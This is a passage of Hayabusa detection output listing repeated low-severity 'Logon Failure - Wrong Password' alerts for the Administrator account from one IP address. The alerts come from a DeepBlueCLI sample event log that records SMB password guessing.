NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WAhW2PErXdwNVrx5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.943 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LoAV3ESqieev2JMC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:12.012 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wFlWFijaFirgsAtJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:12.049 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hSDjuqvzKLaWCWVo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:12.109 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SL0CVu787iFRLiPU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:12.219 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZQDORN33izpv4tGO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:12.253 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v470yorD43fgGyjC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:12.305 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LBbLWVZFDqFxb7dW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:12.360 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RJsowt9MrhXciLOZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:12.404 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uhCVFyMmDI5shASV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:12.452 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yd4SM9EGM7cnO6Z5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:12.490 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PSR1tbtzdDaJDbXs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:12.538 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rNqyjBuN0Pq6WRO1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:12.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vqpMAmE9OvHbFCh2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:12.632 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JfLQAaB0DPvxWQMB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:12.676 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A0kvHMwnj2k0HMLQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:12.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kPqfVDftcR4iRDaw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:12.748 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1bltwm2g13InAJM6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:12.788 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J2iFr8ppe5NzukXF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:12.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7EEUOBohBFRze6hL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:12.887 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NCOFn3WM71KmaZyB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:12.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UdUkBxB1auduRfdS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:12.980 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E2JaWoYK56HRGfW1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:13.015 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a3JTCX9NIOpg6TFB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:13.064 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zFGkdUVAdKcrrREB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:13.108 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7oZW00FpKema01Vw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:13.151 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p4HbNQx0Acf83b1h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:13.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j9aM5UCQbOLvcpI0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:13.238 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BGGChEAIdej9lBhr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:13.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4CaFYB1ImWAWbH0W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:13.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OLa3lkxWiJ00raQh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:13.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vMzyi0jIVLNrodC8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:13.409 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n2repX0roAP2j0TI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:13.460 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gqcpIjdkNpmoTe4A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:13.488 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Edgo9UdNvmMJpiyn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:13.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LpqOTu7Xn7ULipmN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:13.567 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TP0efL79STMbuu9g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:13.610 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HkwWfRi0E5sVY6UT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:13.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IkyCe9NXGExCQS5r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:13.698 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IGnhRwa7P7by9vJO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:13.740 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fh7IGliNbSyKwxpM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:13.782 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1QfgWsAqSYQfB9l5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:13.821 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q8VM66P8Vluf7yrL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:13.861 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cdYiwh3QjdA0Zoge | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:13.904 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ou3FPUI5bFcUvuFC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:13.952 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bMUg8N7apFtUgX9d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:13.991 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U7Cn4n7jQAQaxP6y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:14.024 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: urflPvd1vgYYi2ra | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:14.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pqFtTDD69fNTKROG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:14.113 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: teUZYpNyqJ64Dgcz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:14.152 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9kaKSy3DV5fRKvTc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:14.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gtiZUzpwrnuWIjna | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:14.238 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SD9UhsShNJRp251r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:14.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C5xbL7aO0azgBxfz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:14.342 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xqrUpW8PpI9RAeGk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:14.452 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M80K04eYwfwdzIul | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:14.497 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jcWY7cNeCNgJ3Czr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:14.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1OA561UrTkFnbEj3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:14.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iDnu1G7jmwLoXGLF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:14.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e2v70poTOKPUNZJo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:14.673 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhzoOmgTrdvTS27z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:14.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pyvmBFGhKFgvzM9S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:14.772 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qHC0keHW2YsKeP02 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:14.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 29vkwuFa6njYc86s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:14.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s9687XPVHFiwttdm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:14.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AcNGaeTqTydGinJE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:14.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dWRu7ZC1eo1nn0IQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:15.071 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M52CihyrQk9MOfCR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:15.134 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xBKSOZwS6f9ofXu7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:15.185 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uT1LHJs7kyeMmTtd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:15.237 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7FvZhetkdjnZOSpq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:15.284 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0DDC7WfL5T4d01yT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:15.330 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1dUzuddZH3Stespw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:15.376 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LKpORcDX0ccf1xMq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:15.408 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u4RbbKttCYPld8RR | IP Addr: 192.168.198.149 | AuthPackage: 